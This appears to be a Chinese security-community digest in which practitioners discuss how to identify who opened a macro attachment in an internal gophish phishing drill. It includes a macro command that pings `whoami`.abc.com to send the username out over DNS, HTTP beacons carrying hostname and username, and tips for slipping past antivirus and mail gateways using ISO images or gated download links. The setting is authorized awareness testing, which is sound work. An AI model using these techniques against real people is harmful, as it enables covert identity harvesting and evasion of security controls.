钓鱼邮件如何确定office附件宏的打开者身份？| 总第241周

‍‍

‍‍

0x1本周话题

话题：钓鱼邮件演练，office附件宏怎么确定是哪个人打开的？我用的gophish。

A1：在宏里面加获取计算机信息的内容，宏里面带标识。

Q：那批量发送，每个宏都不一样吗？

A2：起个dnslog，把访问标识通过带进去就访问，一样的宏就行，比如运行命令ping `whoami`.abc.com，你在dnslog那边就能看到了。

Q：这个好像可以有，我们单位统一发的计算机，主机名都一样怎么办？

A3：如果是域内的话，肯定是用户名啊，用户名总不可能是一样的吧，再就是访问ip也可以判断，内网ip跟人做了绑定查一下就是了。叫你们的运维在域控下发策略修改，你不提需求，别人怎么知道你有需求。

A4：我也遇到过一些特殊场景，就是有的电脑没入域，没安装桌管，没安装dlp，没安装杀软，共用电脑。直接分享经验：如果有办法在目标电脑执行命令，就可以获取当前域用户名、foxmail用户目录、桌管日志、dlp配置、杀软配置、内网聊天工具配置、c:/users目录最新5个文件夹等，以上点正则就能提取出用户身份，重复出现两个以上的就是当前用户。纯cmd命令。

Q：那得安装agent吧。还有，如果是手机打开的怎么办呢？

A5：每个人都发内容一样，但链接不一样的邮件。或者宏里面调用一个HTTP请求访问，把主机名和用户名传过去，这样在Web服务器的Log就能看到了。

A6：http://公司/?token=一串每个人都唯一的加密值。这样能防爆破，防伪造，还能精准确认人员，邮件支持图片引用外链的，图片链接也可以用这种，这样能统计钓鱼邮件阅读数。

Q：主机名怎么可能都一样？同一网络内不能使用同一主机名。这是基操。

A7：我们好像发过来都是一样的。买的就是一样的 我们又没用域。

Q：这不是域的问题，你们主机难道不进行改名操作？这是啥情况。都是同一主机名的情况下，很难想象资产报告如何做。

A8：要域管才涉及到主机名吧。钓鱼邮件配合CanaryToken已经可以够了

A9：电脑还行，我们大多数人是手机接收的邮件。

A10：你这个钓鱼场景没想清楚，你要先固定好你的钓鱼场景和利用的方式才能搞，手机打开宏又没用，没有潜在的利用场景，所以就算手机打开又能怎么样。

A11：用ghost之类做的系统主机名就会一样吧，钓鱼场景下想区分用powershell调outlook相关的API应该能读出来用户名。

A12：ghost主机名是一样，但是加域的时候，写个脚本，把机器名改一下就好了，写个自动化加域的批处理，加域的时候自动执行改名操作。可以取登录用户名，也可以取网阿卡mac地址之类的，加域了应该不用写脚本了，域控会自动改的。

A13：主机名一改怕是应用和数据库集群会有问题。

A14：加域的时候改名字。

Q：GHOST不做OOBE，不改SID出来的系统能用吗？做了OOBE，主机名还会是一致的吗？

A15：IT那边做系统的时候是用的一键还原和一备份的模式，有点类似ghost，就是同型号的PC LAPTOP找个机器出来，做模板，然后就是PE下的一键备份工具直接全盘备份下来，然后后面同类型的机器直接一键还原。

A16：不管是哪种备份还原手段，只要是批量使用必须OOBE，不做OOBE，不改SID的系统内的运维直接开了算了。

A17：用dnslog把ip传过去是可行的，搞过。一种场景不能覆盖全部的，今年用表单填写，可以明年用exe，就是exe或者宏不做免杀会老被杀软干掉，登公司杀软后台直接加白样本。还要注意AC需要提前加白。自己从0搭，还是挺费劲的。

A18：不需要免杀的，你exe本身不做特定攻击行为，也就拉起一个HTTP请求就好了。此外，就算是被拦截了，杀软服务器端也可以看到哪些人执行了该程序，那么这也达成了统计目标。简单用py打包成exe，或者没有签名，十有八九是会被杀的，包括宏里vb获取信息去http get，行为也会被拦，倒是把信息放在域名请求里不大会被拦，试过360杀毒，如果是网络版统管放行另说了。

A19：宏搞完了，用ping访问hostname，dnslog记录不会被杀。你可以试试用vb去发起http，360杀毒会拦截的。

A20：我们测试的目的不是为了免杀。是为了统计。杀了有记录不就行了。

A21：钓鱼也得适用万一没统管杀毒的场景，如果杀软不能统一加白的话，那这种钓鱼的成本太高了，需要专项处理。

A22：经验就是如果想尽量精确，能够追踪，那么gophish还不太行

A23：我记得这个平台的rid并不绑定收件人，如果捣乱乱填，结果失真。我们还有另外一个搞笑的。用户A收到后，自己没点，把邮件转发给了他们小组，结果小组成员B点了。但是因为是用户A的RID，所以，统计结果算用户A的。

A24：嗯，不管哪种方式得把收件人信息写入投递的特征里用来追踪，这块只能自己想办法，收件人要跟用户填的东西或者收集的东西比对，尽量排除失真的数据。每家企业情况都不一样，适用方法也需要执行调整，大多数情况下，已经足够适用了。

Q：测试钓鱼邮件的时候，只要碰到exe附件就直接干掉怎么处理？我试过压缩、加密压缩，都给我干掉了。

A25：放到iso镜像里面，或者给个链接去下载，后端校验UA或者ip不能来自邮件网关。

Q：加密压缩，加密文件名也能识别到exe吗？

A26：自家公司可以白名单，在发邮件前一秒取消病毒文件拦截配置，发送，成功后即可恢复安全配置。意思是用甲方的方式可以实现，不用追求黑客的攻击方式，自家测试用poc，商业实战用exp。

A27：虽然不知道你的具体配置情况，但如果如你所述，邮件网关已经自动判定所有携带加密附件为恶意邮件，那么可以在EXE附件，EXE加密附件，EXE强加密附件测试这三项打勾勾了。可以直接忽略这个测试项，做下一个了。zip, 7zip, rar等其他压缩格式也都需要一一确认。

A28：直接excel宏不会被拦，但是默认宏不打开，估计效果不行。EXCEl宏是通过引导机制触发的。一直启用宏开关的估计稀少，如果宏用的不多，直接注册表关闭所有宏调用就一劳永逸了。

0x2

原文始发于微信公众号（君哥的体历）：钓鱼邮件如何确定office附件宏的打开者身份？| 总第241周